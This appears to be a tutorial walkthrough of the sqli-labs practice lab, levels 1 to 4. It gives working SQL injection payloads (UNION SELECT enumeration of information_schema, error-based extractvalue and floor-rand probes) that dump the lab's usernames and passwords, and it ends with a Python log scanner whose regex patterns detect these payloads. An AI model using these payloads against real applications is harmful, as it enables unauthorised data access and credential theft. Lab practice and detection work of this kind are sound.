Introduction: this article has three parts: 1. Overview; 2. Detailed mind map; 3. Detailed explanation.
Description: the overview lists the knowledge points the article covers; the detailed mind map helps organize the ideas and makes them easier to remember, but content the author considers basic is not explained in detail there, so look it up on your own; in the detailed explanation the author adds code statements and similar material following the outline of the mind map and, time permitting, concrete operations, steps and results, plus Tips worth noting (in blue text).
Preface: the hands-on learning environment is Linux + docker + sqli-labs. For environment setup see Chapter 1: SQL Injection Basics -- 1.1 Web Application Architecture Analysis & 1.2 Setting up the SQLi Environment, or message me for the resources I have personally tested.
Tips: everything here is material the author has studied; the text and mind maps are all hand-made. This series will be continued and the process descriptions expanded. Discussion and comments are welcome; bookmark and follow if you find it useful.
1. Overview:
sqli-labs walkthrough
Less-1 source code (id is a string type):
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Less-2 source code (id is a numeric type):
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
Less-3 (the parenthesis must be closed and the rest commented out)
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
Less-4 (the parenthesis must be closed and the rest commented out)
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
Other: injection steps (a clear workflow gets twice the result for half the effort; the linked articles give the details)
1.5 SQL injection workflow: introduction -- target collection, identifying SQL injection, information gathering, data extraction (enumerating databases, tables and data), privilege escalation
1.6 Manual SQL injection methods: important -- manual injection in MySQL -- core syntax for querying data:
Databases: select schema_name from information_schema.schemata
Tables: select table_name from information_schema.tables where table_schema=<database name>
Columns: select column_name from information_schema.columns where table_name=<table name>
Data: select <column name> from <database name>.<table name>
2. Detailed mind map:
3. Detailed explanation:
Less-1 (hands-on with sqli-labs Less-1)
Source code (id is a string type): $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
?id=1
Returns: Your Login name:Dumb
?id=1'
Returns: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
?id=1' and '1' = '1
Returns: normal page
?id=1' and '1' = '2
Returns: abnormal page, which indicates that an injection point is present
?id=1' order by 3--+
--+ comments out the trailing single quote of the original statement
The query returns 3 columns (order by 4 produces an error)
?id=-1' union select 1,2,3--+
Columns 2 and 3 are echoed on the page, so they can be used for injection
?id=-1' union select 1,2,(select version())--+
Check the version information
?id=-1' union select 1,2,(select schema_name from information_schema.schemata)--+
Enumerate databases: the error says the subquery result has more than one row
Subquery returns more than 1 row
?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+
Enumerate databases: group_concat() concatenates the rows into one value and the query succeeds
Returns: Your Password:information_schema,challenges,mysql,performance_schema,security
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
Enumerate tables
Returns: Your Password:emails,referers,uagents,users
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)--+
Enumerate columns: the table name can be written as a hex literal (0x7573657273 is 'users')
Returns: Your Password:id,username,password
?id=-1' union select 1,2,(select group_concat(username,password) from users)--+
Enumerate data
Returns: Your Password:DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4
?id=-1' union select 1,2,(select group_concat(concat_ws('~',username,password)) from users)--+
Format the data with a separator
Returns: Your Password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2
?id=-1' union select 1,2,(select concat_ws('~',username,password) from users limit 0,1)--+
Read the rows one at a time with limit
?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e,floor(rand(0)*2)))--+
Error-based injection with floor()
?id=1' and (select extractvalue(1,concat(0x7e,(select concat(0x7e,username,password) from users limit 0,1),0x7e)))--+
Error-based injection with extractvalue()
Less-2
Source code (id is numeric, so inject directly without closing a quote): $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
?id=1 and 1=1
Your Login name:Dumb
?id=1 and 1=2
No result
?id=1 order by 3
Your Login name:Dumb
Your Password:Dumb
?id=-1 union select 1,2,3
Your Login name:2
Your Password:3
?id=-1 union select 1,2,(select schema_name from information_schema.schemata limit 4,1)
Enumerate databases
Your Password:security
?id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)
Enumerate tables (0x7365637572697479 is 'security')
Your Password:users
?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')
Enumerate columns
Your Password:id,username,password
?id=-1 union select 1,2,(select group_concat(concat_ws('~',username,password)) from users)
Enumerate data
Dumb~Dumb
Angelina~I-kill-you
Dummy~p@ssword
secure~crappy
stupid~stupidity
superman~genious
batman~mob!le
admin~admin
admin1~admin1
...
Less-3 (close the parenthesis and comment out the rest, then inject as before)
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
?id=3') AND ('1'='1
Your Password:p@ssword
?id=3') AND ('1'='2
Error
?id=3') order by 3--+
?id=-3') union select 1,2,(select schema_name from information_schema.schemata limit 4,1)--+
Enumerate databases
Your Password:security
Enumerating tables, columns and data is omitted (same steps as Less-1)
Less-4 (just append ") after the id)
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
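As an added, defender-side example that is not part of the original post or of sqli-labs: a small Python scanner that flags, in web access logs, the request patterns used in the Less-1 to Less-4 steps above (boolean tautologies after a closed quote or parenthesis, ORDER BY column probing, UNION SELECT, information_schema reads, group_concat(), extractvalue()/floor(rand()) error-based probes, hex literals such as 0x7573657273, and the trailing --+ comment). The log lines and the indicator names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit
# Indicator name -> regex applied to each decoded query-string value; the patterns
# mirror the walkthrough steps above. Heuristics only: tune them to your own traffic.
INDICATORS = [
    ("boolean-tautology", r"""\b(and|or)\s*\(?\s*['"]?\d+['"]?\s*=\s*['"]?\d+"""),
    ("order-by-probe", r"\border\s+by\s+\d+"),
    ("union-select", r"\bunion\s+(all\s+)?select\b"),
    ("information-schema", r"\binformation_schema\."),
    ("group-concat", r"\bgroup_concat\s*\("),
    ("error-based-xml", r"\b(extractvalue|updatexml)\s*\("),
    ("error-based-floor-rand", r"\bfloor\s*\(\s*rand\s*\("),
    ("hex-literal", r"\b0x[0-9a-f]{2,}"),
    ("comment-terminator", r"--(\s|\+|$)|#\s*$"),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in INDICATORS]
REQUEST_RX = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def indicators_for_request(request_target):
    """Return the indicator names found in any query parameter of a request target."""
    found = []
    for _, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode pass catches double-encoded payloads
        for name, rx in COMPILED:
            if name not in found and rx.search(value):
                found.append(name)
    return found

def scan_log(lines):
    """Return (request_target, indicators) for log lines that carry at least one hit."""
    hits = []
    for line in lines:
        m = REQUEST_RX.search(line)
        if m and (found := indicators_for_request(m.group(1))):
            hits.append((m.group(1), found))
    return hits

# Constructed Apache-style access log lines replaying the requests of the walkthrough.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/?id=1%27%20and%20%271%27%3D%272 HTTP/1.1" 200 420 "-" "curl/8.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-1/?id=1%27%20order%20by%203--+ HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479)--+ HTTP/1.1" 200 700 "-" "curl/8.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-3/?id=3%27)%20AND%20(%271%27%3D%271 HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-1/?id=1%27%20and%20(select%20extractvalue(1,concat(0x7e,version())))--+ HTTP/1.1" 200 600 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for target, found in scan_log(LOG_LINES):
        print(target, "->", ", ".join(found))
```

Note that the `+` in `--+` decodes to a space, which is why the comment pattern accepts `-- ` as well as the raw `--+`.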